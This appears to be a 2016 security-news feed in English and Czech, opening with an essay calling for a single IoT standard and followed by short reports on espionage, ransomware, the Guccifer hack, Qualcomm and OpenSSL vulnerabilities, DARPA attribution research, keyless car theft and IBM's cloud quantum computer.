In the world of standardization in IOT, there are many wicked problems. To make people accountable and fix the issues, one standard is imperative. There has been very significant shift in new technology adoption. From innovation to adoption of a technology there are series of events that unfold. Before I explain this shift, let me start with a ‘why’ by asking why IOT standardization now? There are 3 reasons why there is a need for standardization of IOT now.
99% devices in the world are not connected. This means that the timing is perfect. Timing was the key for Uber and Airbnb launch and hence the success factor.
50 billion connected devices by 2020 and 2 trillion in revenue means that demand will only rise and hence streamlining is the key.
In 2013-14, approximately 2 billion USD invested in IOT startups in Silicon Valley alone. This only shows that the IOT industry is going to be in the early adopter stage. Hence early adopters of common universal standard is crucial right now as the timing is perfect as 1% of devices in the world is currently connected.
Protocols for interoperability have to be standardized for ease of communication. Each sensor generates data which has to communicate with every other device. Different naming and addressing standards will lead to device searching issues. Hence talking to each other in the same language is of prime importance. The narrative of the English language gaining dominance as the global language supports my argument of having a universal IOT language for communication.
Now talking about the power game of who can influence the standardization process. How standardization will work? Or probably should we be asking will it ever work? To kick start this complex initiative I strongly propose a global campaign for ‘IOTism’. Currently we are witnessing an IOT ecosystem which lacks strong global IPR rules, neutral governance and a balanced participation or representation. The solution to this problem would come from game theory. Without an unbiased authority or a policy maker, it will be impossible to have a truly global IoT ecosystem.
How and what would the governance of the IoT be like? Will it be a state-led agency, or a group under the supervision of the UN, or an industrial consortium? Currently the various power players in the standards world like ITU, ICANN, IEEE, OIC, W3C, ISO, ITEF and industry verticals standard are present who wants to influence a larger pie. Applying Game theory to IOTism for adoption of ONE universal theory – If everyone adopts the standard at the same time, it will be successful. Need of the hour is to bring all institutions together and frame an IOT standard together.
Currently by the end of 2015, IOT Industry market is around 0.8 Trillion USD. The true market value of the IOT industry would be created only if there is integration of all IOT standards into just one. If I assume approx. 400 current standards, then IOT standardization values= 0.8/400= 2 Billion. This per capita or per standard value bring down the efficiency of the IOT industry as a whole. Therefore if and only if the IOT standard share is 1, then the IOT market value can be maximized.
The way a Governance Risk and Compliance (GRC) Automation platform or tool in Cyber security space has a basic foundation which has workflow, dashboard, application linking, access and role management etc and any use case or application module can sit on top of it. Similarly IOT TRUST foundation could be common globally. Any organization/industry is free to map their customized processes on top of the base foundation framework. This will control the input and output of data. Hence achieving a universal standard and a contextual technology layer wrapped on top of it.
Also it is imperative to understand that once the IOT standardization is achieved, there should be a smooth transition strategy like a migration roadmap plan for the previous standards (currently approximately 450 IOT standards exists) and not just leave on the market to decide the adoption. The responsibility of this group would be to think ahead of the curve and make the necessary changes to the framework to be compatible and accommodative for future innovations. IOT is an extension to human organs and hence the game of IOTism to ORGANism should be played very responsibly. We should keep in mind what happens to humanity when there is technological singularity! Else the next world war could be fought over standard Information of Things!
Swiss defense department victim of cyber espionage
6.5.2016 Security
The Swiss Defense Department was recently victim of a cyber attack, the offensive has come after a presentation on cyber espionage to the FIS.
The Swiss Defense Department was recently a victim of a cyber attack, the offensive has come after a presentation on cyber espionage to the Federal Intelligence Service. The cyber attack was announced by the Swiss defense minister Guy Parmelin that explained that the Federal Department of Defence, Civil Protection and Sports was targeted by hackers.
The Vaud SVP politician Guy Parmelin heads the Department of Defence, Civil Protection and Sport (VBS).
Of course, the attribution of the attack is very hard, but Government experts have found many similarities with another cyber attack that hit the government-owned Ruag firm.
Swiss Department Defense
The Ruag firm is a technology company, based in Bern, that supplies the country’s military with munitions, government experts believe it was a victim of a cyber espionage campaign. The hackers exfiltrated data from the systems of the firm, which is wholly owned by the Swiss government, though the extent of the theft was unknown.
Below a portion of the interview released by Parmelin to the Swiss daily Tages-Anzeiger.
“According Tagesanzeiger.ch/Newsnet-Informationen hang the attacks against the VBS with a major cyber attack on the defense group RUAG together, behind Russia is suspected. Is become active in this matter, the Federal Council?
The Federal Council has been informed. He has proposed several measures that are now being implemented. The Attorney General has instituted a process.
What were these attacks?
The attacks were of industrial espionage. Because Ruag working for the army and the federal government and 100 percent of the federal government is one, it is very important for us to minimize risks.”
Parmelin pointed out industrial espionage has the root cause of the cyber attack and said his department was able to mitigate the attack and restore normal operations. He hasn’t provided further details on the attack that hit the Swiss Defense Department.
The Ruag has announced the institution of additional security measures in order to repel further cyber attacks.
The cyber espionage represents one of the most worrying problems for the Federal Intelligence Service (FIS) , as reported in the “Management Report 2016″.
Hackers continuously target both Swiss SMEs and larger companies, Parmelin highlighted that similar cyber attacks could have significant consequences of the Swiss Government.
Vyhledávání odposlechů
6.5.2016 Bezpečnost
Miniaturizace elektronického zařízení má za cíl zvýšení pohodlí užívání. Dává to také široké možnosti k narušení soukromí pomocí odposlechů a minikamer malých rozměrů, které lze snadno ukrýt v místnostech nebo zakamuflovat v předmětech každodenní potřeby.
Mnoho situací vyžadujeochranu důvěrných informací, utajení údajů obchodních partnerů, diskrétnost vedených obchodních rozhovorů, na kterých závisí finanční bezpečí firmy. Nekalá konkurence je schopná zajít velmi daleko, aby ukradla důležité údaje. Instalují skryté kamery, odposlouchávají pomocí štěnic a jiných zařízení dostupných na trhu, které jsou pouhým okem neodhalitelné. Využívání služeb firem odhalujících odposlechy je velmi nákladné a nedá se vždy provést tak, aby nevzbudilo podezření spolupracovníků. Proto se vyplatí investovat do zařízení, které umožní ochránit firemní prostory před špionáží a v případě štěnic nebo mikrokamer umožní lokalizovat a zneškodnit je.
Detektory odposlechu se hodí také ve velmi soukromých situacích, kdy se veřejně známá osoba chce zabezpečit před odposlechem ze strany nepovolaných osob a únikem intimního obsahu do médií
Detektory odposlechu a skrytých kamer jsou vynikajícími zařízeními k zabezpečení svého soukromí a vždy, když máme podezření, že kdosi zasahuje do našich životů bez našeho vědomí.
Detektory odposlechu
Rádiovou štěnici je možné koupit na internetu již za několik stovek korun. Je možné je instalovat jak v kancelářích, tak v bytech nebo ve vozidlech. Kamuflování odposlechů v předmětech každodenní potřeby či v nich použité moderní technologie umožňují monitoring trvající i několik týdnů diskrétním způsobem nevzbuzujícím žádné podezření. Na trhu jsou dostupné také odposlechy GSM. Díky technologii globálního spojení je možné v kterékoliv chvíli zavolat z jakéhokoliv místa na světě na SIM kartu ukrytou např. v dálkovém napájení nebo v napájecí liště a diskrétním způsobem odposlouchávat okolí.
Vyhledávání odposlechů Spy Shop
Vyhledávání odposlechů je stejně oblíbené, jako samotné odposlouchávání. Zároveň s rozvojem odposlechových technik se rozvíjejí i způsoby jejich odhalování. V současnosti se na trhu nachází celá řada zařízení, které umožňují odhalovat odposlechy.
Nejčastějším řešením jsou skenery frekvence - moderní detektory spolupracující s měřiči jejich intenzity. Takováto kombinace umožňuje zachytit signál odposlechu a zaměřit jeho zdroj. V okolí, kde se nachází celá řada vysílačů signálů, je základem odhalení odposlouchávacího zařízení připojení se k přenosu a jeho odposlouchávání.
Pouze pokročilé skenery signálů a měřiče jejich síly s vysokou úrovní přesnosti se v houštině přenosů osvědčí.
Detektory skrytých kamer
Současné skryté kamery mají rozměry menší než zapalovač a jejich objektivy se šířkou počítanou v milimetrech umožňují nahrávat obraz v kvalitě i Full HD. Skryté kamery v předmětech každodenní potřeby slouží k diskrétnímu nahrávání a získání cenných informací. Miniaturní kamery s GSM modulem nebo IP kamery umožňují vzdálené monitorování místnosti pomocí mobilního telefonu nebo počítače. Takováto zařízení jsou prakticky neviditelné pouhým okem a stávají se potencionálním rizikem úniku cenných informací jak soukromých, tak firemních.
Spolu s rozvojem technik špionáže se rozvinuly také metody kontrašpionáže. Objevila se specializovaná zařízení k vyhledávání skrytých kamer. Současná technika je schopna odhalit jak drátové tak i bezdrátové kamery, zapnuté nebo ne. Dostupná v rozumných cenách a legální umožňuje dokonce i malým firmám chránit se před následky úniku informací.
Robin Hood CyptMix ransomware promises to donate fee to charity
6.5.2016 Virus
This is a novelty in the cyber criminal underground, crooks behind the new born CyptMix ransomware promise to donate the fee to charity.
No doubts, a very creative idea to extort money to the victims enticing them to pay for a good cause and telling them to think to have the opportunity to help the children.
Of course, the criminals don’t provide further details on the way they intend to donate the earnings.
“Your money will be spent for the children charity. So that is mean that You will get a participation in this process too. Many children will receive presents and medical help! And We trust that you are kind and honest person! Thank You very much! We wish You all the best! Your name will be in the main donors list and will stay in the charity history!” reads the ransom note sent to victims of the CyptMix ransomware shared by the experts at Heimdal Security who spotted the new threat.
It is the first time that experts see this kind of Psychological manipulation in ransomware-based attacks. This new strain of malware is spread through spam emails and drive-by attacks.
Even more curious is that the alleged benefactors called themselves the “Charity Team.”
Victims of the CyptMix ransomware need to pay 5 bitcoins (approximately $2200 at the current price per bitcoin), a ramson very expensive respect other similar threats.
The experts in Heimdal Security revealed that new threat re-uses large parts of open-source ransomware code. For example, this ransomware is a
“For example, this ransomware is a CryptoWall 4 variant and it also includes CryptXXX components.” states Heimdal Security.
The crooks behind the CyptMix ransomware have also fixed the developmental errors which made the decryption tool created by Kaspersky to work.
We can only hope that these criminals have truly noble intentions, as wrote Andra Zaharia, from Heimdal Security.
“We can hardly trust cyber criminals to have a kind and generous side to them,”
Hacker Guccifer: Do e-mailu Clintonové jsem pronikl snadno
6.5.2016 Kriminalita
Vniknout do soukromého mailu demokratky Hillary Clintonové nebyl problém. V rozhovoru z virginského vězení to pro televizi FoxNews prohlásil bývalý rumunský hacker Marcel Lehel Lazar známý pod přezdívkou Guccifer.
„Pro mě to bylo snadné... a pro každého,“ řekl. Tento kousek se mu měl povést několikrát v roce 2013, kdy Clintonová řídila diplomacii, a jak se ukázalo, služební korespondenci vyřizovala ze své soukromé adresy.
Guccifer rovněž řekl, že uschoval dva gigabyty údajů, které jsou prý příliš žhavé a obsahují „záležitosti národní bezpečnosti“. Zda mohou pocházet i z političčiny pošty, není známo. Vyšetřování e-mailů Clintonové včetně možného úniku utajovaných informací běží od loňska, není uzavřené a v kampani se stalo vítanou municí pro republikána Donalda Trumpa.
Hacker pronikl do pošty několika celebrit i prezidentské rodiny Bushů. Letos v dubnu byl vydán do USA z Rumunska, kde si už odpykával sedmiletý trest za kyberútoky.
Guccifer admits the hack of Hillary Clinton ’s private email server
6.5.2016 Hacking
Marcel Lehel Lazar also known as Guccifer has admitted the hack of the Hillary Clinton ‘s private email server occurred in 2013.
A Romanian hacker has claimed it was ‘easy’ to gain access to Hillary Clinton ’s email server. Marcel Lehel Lazar, who goes by ‘Guccifer’, recently had a series of interviews with Fox and NBC News outlets, providing some details concerning his ability to hack the Clinton email server.
Lazar is currently sitting in a Virginia jail, being held for the hacking of email accounts of senior political members and Clinton friend, Sidney Blumenthal. It was Clinton’s connection with Blumenthal that enabled Lazar to access the Clinton server.
Lazar first got into Blumenthal’s AOL email, in March 2013, through detailed Internet research to help him guess Blumenthal’s security question. From Blumenthal’s email, Lazar was then able to track emails based on IP headers and ultimately gain access to the Clinton email server.
Lazar described the server to NBC News (from a Bucharest jail cell) as, ‘an open orchid on the Internet’ where he was able to find ‘hundreds of folders’. While he says he only accessed the server twice, he claims to have obtained 2-gigabytes of information. He has thus far refused to provide any of the emails to which he gained access. Of the 2-gigabytes of information, he has told Fox News they are hidden because they are ‘too hot’ and ‘a matter of national security’.
It has been of concern about who has had access to the Clinton email server. Lazar has said he was able to see ‘up to 10,…, IPs from other parts of the world.’ Research into emails during Clinton’s time as Secretary of State has already shown approximately 2,200 emails that contained classified information, with some identified as “Top Secret”.
Lazar has been extradited from Romania to face nine federal counts of hacking. He has pleaded not guilty and faces a September 12th trial, though he is willing to cooperate with government officials.
The Hillary Clinton presidential campaign camp has noted that Lazar is a criminal and there is ‘absolutely no basis to believe the claims’. They also added the details he has given of the ‘server are inaccurate’.
Three-quarters of Android devices affected by the Qualcomm software flaw
6.5.2016 Vulnerebility
Mandiant – FireEye has disclosed the details of a serious information disclosure vulnerability affecting one of the Qualcomm software package widely used.
Security researchers from the Mandiant firm have discovered a “high severity” vulnerability in the Qualcomm tethering controller (CVE-2016-2060) that could be exploited by a malicious application to access user information.
Recently Google released an Android update that addresses tens of vulnerabilities, including the Qualcomm one.
FireEye reported the issue to Qualcomm in January and the vendor issued a fix by early March and sent the update to various device manufacturers that will have to distribute the patch to the end-users.
The flaw affects the Android network daemon ‘netd’ and was introduced by Qualcomm when it provided new APIs for the ‘network_manager’ system service.
“CVE-2016-2060 is a lack of input sanitization of the “interface” parameter of the “netd” daemon, a daemon that is part of the Android Open Source Project (AOSP). ” states FireEye in a blog post. “The vulnerability was introduced when Qualcomm provided new APIs as part of the “network_manager” system service, and subsequently the “netd” daemon, that allow additional tethering capabilities, possibly among other things. Qualcomm had modified the “netd” daemon.”
The issue in the Qualcomm software affects devices running Android 5.0 Lollipop and earlier, a significant impact if we consider that more or less 73 percent of Android devices are affected by the vulnerability. Fortunately, the vulnerability has limited impact on mobile devices running Android 4.4 and later due to significant security enhancements.
The experts also highlighted that the Qualcomm software is used in several projects, including the popular CyanogenMod. The flaw can be exploited by attackers to escalate privileges to the built-in “radio” user, its permissions higher than the ones normally assigned to third-party apps.
An attacker can use a malicious application that is granted the “ACCESS_NETWORK_STATE” permission that is so allowed to invoke the vulnerable API.
“The most feasible way of exploiting CVE-2016-2060 is by creating a malicious application. A malicious application needs only to request access to the “ACCESS_NETWORK_STATE” permission, a widely requested permission. Figure 16 shows how the “addUpstreamV6Interface(..)” method can be used to inject the command ‘id’.” continues the post.
What could an attacker do if they successfully exploit this vulnerability?
On vulnerable older devices, the attackers can use a malicious application to extract the SMS database and phone call database, access the Internet, and perform any operation allowed by the “radio” user.
On vulnerable new devices, the attackers have fewer options to violate the device, for example, they can modify additional system properties. In both cases, the victims have no indication of the ongoing attack.
“It should be noted that once the vulnerability is exploited, there is no indication to the user that something has happened. For example, there is no performance impact or risk of crashing the device.”
ESET: útočníci používají stále více druhů zranitelností
6.5.2016 Zdroj:Živě Bezpečnost
Podívejte se, jak to vypadá ve slovenské centrále společnosti ESET zaměřené na IT bezpečnost
Na co si dát pozor, abyste nepřišli o data na Windows, OS X nebo Androidu?
Největším trendem je ransomware
ESET: útočníci používají stále více druhů zranitelností
Společnost ESET založenou v roce 1992 (reálně už zakladatelé vyvíjeli produkt od roku 1987) asi v našich končinách netřeba díky produktu NOD32 nebo Smart Security příliš představovat, stejně jako například konkurenční Avast nebo AVG. ESET je stále soukromou společností, ale daří se jí růst po celém světě.
Momentálně už má téměř 1 200 zaměstnanců, třetina z nich přitom tvoří inženýry. Software pro koncové uživatele i firmy je distribuován po celém světě a s tím souvisí i šíře podpory a získaná data. Jak to vypadá přímo v centrále ESETu, jaké jsou trendy a další spoustu zajímavostí, to se díky reportáži dozvíte v článku.
NOD: Nemocnice na Okraji Disku
Trochu vtipným začátkem je původ značky prvního produktu NOD, který vycházel z tehdy populárního seriálu „Nemocnice na kraji města“. Protože původní tvůrci viděli jasnou spojitost s viry, se kterými se musí potýkat i živé organismy.
ESET se může pochlubit velkou spoustou ocenění v mnoha testech antivirů a bezpečnostního softwaru po celém světě, i když je konkurence v této oblasti poměrně velká. Podle IDC je ESET pětkou v celosvětovém srovnání, ale třeba v Japonsku je ESET nejoblíbenějším řešením a tvoří jeden z největších trhů. Software používá přibližně 100 milionů uživatelů, ale pokud jde o rozdělení mezi koncovými řešeními a firemními, je to přibližně 50 na 50.
Počet zaměstnanců ESETu se v rámci celého světa dostane brzy na k 1 200, třetina tvoří R&D
Pokud jde o vývoj, ESET má týmy u nás v Praze a Jablonci nad Nisou, několik dalších pak i v ostatních zemích. Ve všech zemích kde je ESET k dispozici jde ale hlavě o distributory. Zástupci se vyjádřili i k problému dostupnosti mladých „mozků“, které je stále těžké získat. Obory zaměřené na kyberbezpečnost teprve začínají a po letech ve školách je situace na trhu stejně zcela jiná. Realitou je tak většinou jediné řešení - je nutné si nadané studenty „vychovat“.
Houston aneb hlavní kontrolní centrum
Vývoj antiviru se dělí na dvě části – JAK detekovat (jádro) a CO (viruslab). Detekce se točí kolem velkého množství vzorků virů pro zlepšení přesnosti rozpoznání i s možností univerzálního použití (už nejde o hashe jako v historii). Cílem je, aby bylo možné signaturou pokrýt desítky tisíc virů ze stejné třídy, ale zároveň aby nedocházelo k falešné detekci.
Houston - centrální místnost
Denně na servery ESET chodí 300 tisíc unikátních souborů, které ještě nikdy předtím nebyly rozpoznané a dále se automaticky zpracovávají. Tvůrci škodlivých programů totiž často používají právě polymorfismus, který automaticky generuje obrovská kvanta verzí souborů (virů) které se liší a nějaký jednoduchý systém rozpoznání pomocí hashů tak už není možný. Jádro malwaru zůstává většinou zachované nebo se v rámci verzí mění velmi málo, ale co se mění hodně, jsou různé „ochranné vrstvy“ binárních souborů.
Hlavní obrazovky v „Houstenu“ ukazují detekce malwaru na jednotlivých místech planety, kde uživatelé zároveň používají ESET. Čím červenější, tím větší počet
V rámci viruslabů mezi sebou jednotlivé společnosti spolupracují, konkurence je hlavně v technologii a marketingu. Po automatickém zpracovávání se do zajímavých souborů a zkoumání pouští i lidští analytici, kteří mají k dispozici dva počítače – jeden pro běžnou práci napojený na firemní síť a druhý počítač, který je na oddělené síti a může se na něm infikovaný soubor pouštět pro sledování jeho chování v reálném čase. Zkoumání může probíhat klidně i hodiny či dny, pokud jde o podrobnější vyšetřování většího nebezpečí či útoku, tak i měsíce.
Karel JavĹŻrek
Zvětšit video
Masivní nástup ransomware na desktopu i Androidu
Ransomware je druh malwaru, který různým způsobem blokuje přístup k zařízení nebo k vašim datům a pro odemknutí vyžaduje různě vysoké výkupné, které musíte zaplatit. Moderní ransomware používá i techniky pro urychlení zaplacení, například časový odpočet, po kterém odmaže tisíc souborů a podobně. Některé už jsou vychytané na takové úrovni, že po infekci uživatel nějakou dobu nic nepozná, potichu vyčkávají a objeví se například až po týdnu a podobně.
Často se využívá sociálního hackingu a cílem je přesvědčit uživatele, aby souboru důvěřoval
Nejhorším problémem je, že propracovaný malware dokáže simulovat na Windows i na Androidu například přihlašovací obrazovky, díky čemuž dokáže donutit uživatele zadat administrátorské heslo do falešného pole a tak ho získat. Vzhledem k tomu, že ransomware soubory zašifruje nebo přístup do systému zahesluje, takřka neexistuje systém „vyčištění“. I když některé starší lze už dnes odšifrovat, moderní už používají silné šifry, takže zašifrované soubory nelze rozšifrovat.
Ukázky ransomwaru a požadavků na výkupné pro dešifrování dat
Uživateli tak nezbývá než zaplatit nebo přijít o data. Tvůrci ransomware díky tomu získávají obrovské množství peněz, což jim umožňuje ještě dále vylepšovat tento typ malwaru a celého systému. Už se dokonce objevují i ransomware nejen s návodem, ale i podporou, která vám poradí, jak pomocí bitcoinu zaplatit a získat dešifrovací klíč. Vše je pochopitelně řešené přes TOR a darknet.
Tvůrcům ransomwaru nechybí ani kreativita a klidně si zahrají hru, kdy vám smažou tisíc souborů za 24 hodin nebo po každém restartu počítače
Podle statistik už jedna z pěti organizací zažila útok pomocí ransomware, problém ale je, že se většinou vše tají, protože by to znamenalo ztrátu reputace, takže často raději zaplatí. Útočníci tak z tohoto přístupu začínají mít skvělý byznys, protože některý ransomware má schopnost šifrovat i data na vzdálených discích, zálohách a dalších zařízení na síti a v takovém případě firmě nezbývá nic jiného, než zaplatit. Výsledek je přitom nejistý, ani poté totiž nemají jistotu, že dešifrovací klíč dostanou a útočník může klidně požadovat ještě větší výkupné.
Jak se vyvarovat infekci?
Mezi hlavní kanály, jak se malware dostane na počítač, patří stažení aplikací z internetových stránek, stažení infikovaných aplikacích z „oficiálních“ webů známých aplikací, infikovaná příloha v emailu a trojan, který dodatečně stáhne škodlivý soubor. Samostatnou kapitolou je pak ruční vzdálená instalace přes vzdálenou plochu na daný počítač.
Základ tak je nestahovat nejen aplikace „třetích“ stran do operačních systémů, ale také si dát pozor i na ty, které se tváří jako oficiální. Jeden z případů ukázal, že útočníci vytvořili duplicitní web na stažení běžně používaného zdarma dostupného softwaru, přičemž po kliknutí na odkaz se většinou začal stahovat oficiální soubor. Pro počítače s vybranou ip adresou však došlo ke stažení upravené infikované verze, která se však tvářila zcela normálně a uživatel nic nepoznal ani po instalaci.
KeRanger se dostal do OS X přes infikovanou aplikaci Transmission přímo na oficiálních stránkách, protože měl i legitimní vývojářský certifikát. Došlo tak ke třem úspěšným podvodům v jednom až k finální instalaci na počítač uživatele
V případě desktopu to platí pro Windows i pro OS X. Na Androidu se rovněž vyvarujte stahování a instalací aplikací třetích stran, vždy používejte pouze oficiální obchody - App Store, Play Store, Windows Store a kontrolujte recenze, zda nejsou podezřele negativní.
Aktualizujte vše, zálohujte vše a používejte antivirus
Dalším problémem, který se rozmáhá, je že záškodníci dokáží do počítače nejdříve dostat neškodný program a s kódem, který žádný antivirus nedetekuje, protože nic škodlivého nedělá.
Avšak i taková aplikace může například prohledat systém a zjistit slabinu například v neaktualizované verzi Acrobat Readeru a podobně, dodatečně získá zvýšená práva a zajistí funkční malware skrze tuto díru. Proti tomuto se nelze ochránit žádnou databází a detekcí, proto moderní antiviry prohledávají počítač na programy, které jsou staré a neaktualizované a jsou tak potenciálním nebezpečím.
Další důležitou částí je zálohování, ideálně velmi často a v nejlepším případě do offline zálohy, která tak nemůže být zašifrovaná pomocí ransomware. Třetí základní radou je pochopitelně používání antiviru nebo podobného bezpečnostního řešení.
U.S. developing Technology to Identify and Track Hackers Worldwide
6.5.2016 Safety
Without adequate analysis and algorithms, mass surveillance is not the answer to fighting terrorism and tracking suspects.
That's what President Obama had learned last year when he signed the USA Freedom Act, which ends the bulk collection of domestic phone data by US Intelligence Agencies.
There is no doubt that US Government is collecting a vast quantity of data from your smartphone to every connected device i.e. Internet of the things, but…
Do they have enough capabilities to predict and identify terrorists or cyber criminals or state-sponsored hackers before they act?
Well, if they had, I would not be getting chance to write about so many brutal cyber attacks, data breaches, and terrorist attacks that not only threatened Americans but also impacted people worldwide.
The Ex-NSA technical director William E. Binney, who served the US National Security Agency for over 30-years, said last year in the front of Parliamentary Joint Committee that forcing analysts to examine billions of records crush their ability to identify actual threats.
Technology to Track and Identify Hackers
Now, the Pentagon wants a better way to not only identify the malicious hacker but also looking for practical algorithms that can predict where that hacker might attack next.
Defense Advanced Projects Agency (DARPA) is offering funding for security researchers who can help the agency to develop algorithms that can identify hackers under its new game-changing initiative called ‘Enhanced Attribution Program’.
Although organizations and countries give their best to identify cyber campaigns who infiltrated their critical infrastructure, tracking down the culprits has always been a difficult task — thanks to TOR, Virtual Private Networks (VPNs), and other methods used to hide the attack source.
However, through this new initiative, the United States military research agency DARPA hopes that agencies would quickly track and identify sophisticated hackers or criminal groups by monitoring their exact behavior and physical biometrics.
The aim of Enhanced Attribution program is to track personas continuously and create “algorithms for developing predictive behavioral profiles.”
"The goal of the Enhanced Attribution (EA) program is to develop technologies for generating operationally and tactically relevant information about multiple concurrent independent malicious cyber campaigns, each involving several operators; and the means to share such information with any of a number of interested parties without putting at risk the sources and methods used for collection," reads the project’s official site.
In other words, the Enhanced Attribution Program will not only help the government characterize the cyber criminal but also share the criminal’s modus operandi with potential victims and predict the attacker’s next target.
Enhanced Attribution Project
DARPA also wants the program to include algorithms to predictive behavioral profiles within the context of cyber campaigns, as well as technologies to validate and improve this knowledge base with public and commercial sources of information.
The program is divided into three tracks:
Behavior and Activity Tracking and Summarization
Fusion and Predictive Analysis
Validation and Enrichment
Each track deals with different levels of behavior data collection and analysis.
The Enhanced Attribution Program will last 18 months, so if you have a crazy idea to track down malicious hackers, you can submit your research proposal until June 7, 2016.
How a modern car thief can steal a vehicle by clicking a button
6.5.2016 Crime
The Channel 2 journalist and Consumer Investigator Jim Strickland investigated a mysterious car theft after he received home security camera footage showing a car thief in action.
It seems that thieves are using a new electronic equipment to open the driver-side door of locked cars.
The analysis of the video revealed that the car thief was holding something in his hand so the journalist decided to ask the option of an expert, the special agent with the National Insurance Crime Bureau, Dave Renau.
“It’s a like device that’s being used to pop open the locks by reading the fob signal that communicates between the fob and the vehicle itself,” Renaud told Strickland.
Renaud also added that the NICB investigated similar cases from Chicago, Long Beach and Corona, California.
In all the cases the car thief approach locked, parked vehicles with a mysterious device in his hand and just by clicking the a button is able to open the door.
A dashboard camera in Steve Doi’s car captured a crook holding a black device before entering the car and making off with expensive electronics.
“On the video, you can hear the door locks go, ‘Blip,’” Doi said the WSB-TV.
At this point, Strickland requested the support of a hacker, the popular expert Samy Kamkar.
In August 2015, Samy Kamkar presented RollJam, a $30 device designed to exploit a design flaw in the protocol that determines how keys communicate with car and unlock the majority of car doors.
“What’s your confidence level that you’re going to be able to break into my rental car?” Strickland asked Samy Kamkar. “I’m fairly confident I’ll be able to break in,” Kamkar told Strickland.
Kamkar agreed to demonstrate how to break into a car without a key, exactly like a car thief.
Kamkar explained that the hackers capture the radio-frequency signal of the fob, he made it with his laptop, in order to analyze it.
“Basically, I’m looking at the signal that the key fob sends to the vehicle,” Kamkar told Strickland.
Once he detected the signal he programs a circuit board to intercept the coded unlock signal.
Kamkar used the coded unlock signal to his device in order to unlock the car door by pushing a button.
“Virtually every vehicle is vulnerable to the same type of attacks,” Kamkar explained to Strickland.
The device used by Kamkar is not able to start the ignition, but Atlanta police confirmed to have investigated cases in which the car thief used a device that has done it.
The detective Steven O’Hare told Strickland that he observed also a case in which the car thief opened the door of the vehicle in a classic way by popping a door handle off, but once inside, he used a particular electronic control module. Then he plugged it into the car On-board diagnostics (OBD) port to start the car.
Strickland also reported the testimony of a popular car thief who confirmed the existence of such a device, the same one that allowed the criminal to steal at least 16 different SUV models.
Want to Use Quantum Computer? IBM launches One for Free
5.5.2016 IT
What would you do if you get access to a Quantum Computer? IBM Scientists launches the world’s first cloud-based quantum computing technology, calling the IBM Quantum Experience, for anyone to use. It is an online simulator that lets anyone run algorithms and experiments on the company's five-qubit quantum computer.
Quantum computers are expected to take the computing technology to the highest level, but it is an experimental and enormously complex technology that Google and NASA are working on and is just a dream for general users to play with.
Hold on! IBM is trying to make your dream a reality.
IBM just made its new quantum computing project online, making it available for free to anyone interested in playing with it.
Quantum Computers — Now A Reality!
IBM launches its Quantum Computer Free for Everyone on the Cloud
The technology company said on Wednesday that it is giving the world access to one of its quantum computing processors, which is yet an experimental technology that has the potential to perform much faster calculations than today's computers.
You can now access IBM's five-qubit quantum computing processor, which is located at its a research center in Yorktown Heights, New York, through the cloud to run experiments and test applications.
All you will need to do is request an invitation from IBM through a web form that will ask for your institution details and your level of computing experience.
Also Read: Fastest Operating System for Quantum Computing Developed By Researchers.
Quantum Computers Vs. Regular Computers ?
Quantum computers can theoretically be much faster than traditional computers because they take advantage of quantum mechanics.
While traditional computers use the "bits" to represent information as a 0 or a 1, Quantum computers use quantum bits or "qubits" to represent information as a 0, 1, or both at the same time. This means that 2 qubits could potentially have 4 values at the same time: 00, 01, 10, and 11.
In other words, a quantum computer with just 50 qubits will be much more powerful than any supercomputer available today.
360° Tour of the IBM Research Quantum Lab:
According to IBM, its five-qubit quantum computing processor is just a "small step" towards a useful quantum computer, though the company hopes to build a quantum computer with a medium-size quantum processor of 50-100 qubits within the next 10 years.
With a step ahead in the quantum computing, IBM's qubit processor is the world's first quantum processor accessible to the public, even if through the cloud.
Users who want to access the quantum processor can stay in the comfort of their homes or offices and work with qubits, study tutorials, and run simulations using the cloud and their computers or mobile devices.
Experience Quantum Computing Now!
High-Severity OpenSSL Vulnerability allows Hackers to Decrypt HTTPS Traffic
5.5.2016 Vulnerebility
OpenSSL has released a series of patches against six vulnerabilities, including a pair of high-severity flaws that could allow attackers to execute malicious code on a web server as well as decrypt HTTPS traffic.
OpenSSL is an open-source cryptographic library that is the most widely being used by a significant portion of the Internet services; to cryptographically protect their sensitive Web and e-mail traffic using the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol.
One of the high-severity flaws, CVE-2016-2107, allows a man-in-the-middle attacker to initiate a "Padding Oracle Attack" that can decrypt HTTPS traffic if the connection uses AES-CBC cipher and the server supports AES-NI.
A Padding Oracle flaw weakens the encryption protection by allowing attackers to repeatedly request plaintext data about an encrypted payload content.
The Padding Oracle flaw (exploit code) was discovered by Juraj Somorovsky using his own developed tool called TLS-Attacker, which allows developers to test their TLS servers with specific TLS messages.
The "OpenSSL Padding Oracle in AES-NI CBC MAC Check" exists in the cryptographic library since 2013, when OpenSSL patched another Padding Oracle flaw called Lucky 13 that compromised TLS cryptography.
"What we have learned from these bugs is that patching crypto libraries is a critical task and should be validated with positive as well as negative tests. For example, after rewriting parts of the CBC padding code, the TLS server must be tested for correct behaviour with invalid padding messages. I hope TLS-Attacker can once be used for such a task." Juraj said in a blog post.
The second high-severity bug, CVE-2016-2108, is a memory corruption flaw in the OpenSSL ASN.1standard for encoding, transmitting and decoding data that allows attackers to execute malicious code on the web server.
The vulnerability only affects OpenSSL versions prior to April 2015. Although the issue was fixed back in June 2015, the security impact of the update has now come to light.
According to OpenSSL, this flaw can potentially be exploited using maliciously-crafted digital certificates signed by trusted certificate authorities.
OpenSSL also patched four other low-severity vulnerabilities including two overflow vulnerabilities, one memory exhaustion issue and one low severity bug that resulted in arbitrary stack data being returned in the buffer.
You can find more technical details about the critical OpenSSL vulnerabilities on CloudFlare.
The security updates have been released for both OpenSSL versions 1.0.1 and 1.0.2 and administrators are advised to apply patches as soon as possible.
Hacker is Selling 272 Million Email Passwords for Just $1
5.5.2016 Hacking
A massive database of 272 million emails and passwords for popular email services, including Gmail, Microsoft, and Yahoo, are being offered for sale on the Dark Web for less than $1, media reports.
An anonymous Russian hacker, who goes by the moniker "the Collector," was first spotted by cybersecurity firm Hold Security advertising 1.17 Billion user records for email accounts on a dark web forum.
The stolen credentials apparently came from some of the world’s biggest email providers, including Gmail, Yahoo, Microsoft and Russia’s Mail.ru.
When security analysts at Hold Security reached out to the hacker and began negotiating for the dataset to verify the authenticity of those records, the hacker only asked for 50 Rubles (less than a buck) in return of the complete dump.
However, it seems that there is actually nothing to worry about.
Hold Security CEO Alex Holden said that a large number of those 1.17 Billion accounts credentials turned out to be duplicate and that only 272 Million records were unique.
